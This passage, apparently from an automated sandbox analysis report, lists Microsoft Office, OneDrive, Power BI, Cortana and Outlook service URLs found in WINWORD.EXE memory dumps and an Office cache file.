Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nth9
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.office.net
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net8
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netN
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.office.neta
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netk
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.office.nets?
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.onedrive.com
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comcent
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/importsJ
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets:IU
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups0/mac3J
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/ne
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/6
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://augloop.office.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://augloop.office.com/v2
Source: WINWORD.EXE, 00000001.00000003.417996939.00000000109AE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292292706.00000000109AE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571413486.00000000109AE000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comi
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: WINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.entity.
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: WINWORD.EXE, 00000001.00000002.571191483.0000000010861000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417530932.0000000010865000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey(
Source: WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxXK
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://config.edge.skype.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/OfficeQLL
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/OfficeaK
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cortana.ai
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cortana.ai/api
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai:$
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cr.office.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.o365filtering.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com#
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com(
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com:7P
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comO
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comn
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comx7
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileK
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies6
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dev.cortana.ai
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://devnull.onenote.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comedOw
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://directory.services.
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office75
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net//8E
